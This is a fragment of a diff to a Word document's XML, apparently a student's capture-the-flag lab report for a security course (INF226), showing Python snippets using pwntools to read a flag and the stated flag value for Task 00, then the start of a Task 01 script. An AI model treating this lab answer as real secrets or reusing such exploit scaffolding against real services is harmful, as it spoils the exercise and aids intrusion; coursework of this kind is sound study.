+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recieved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recvall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>().</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>decode</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>recieved</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>splitlines</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>()[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'Flag 00: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1049,13 +1854,16 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:noProof/>
-        </w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09A9DFC3" wp14:editId="132E05D2">
-            <wp:extent cx="4107180" cy="1057275"/>
-            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
-            <wp:docPr id="1969026676" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F49B703" wp14:editId="62F9A1EC">
+            <wp:extent cx="5972810" cy="1187450"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
+            <wp:docPr id="173540068" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1063,13 +1871,3420 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1969026676" name="Picture 2" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="173540068" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5972810" cy="1187450"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>As the output shows, the flag for task 0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>INF226{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>s33kret c0de</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:u w:val="single"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="1E4E79"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Task 01</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>#!/usr/bin/python3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
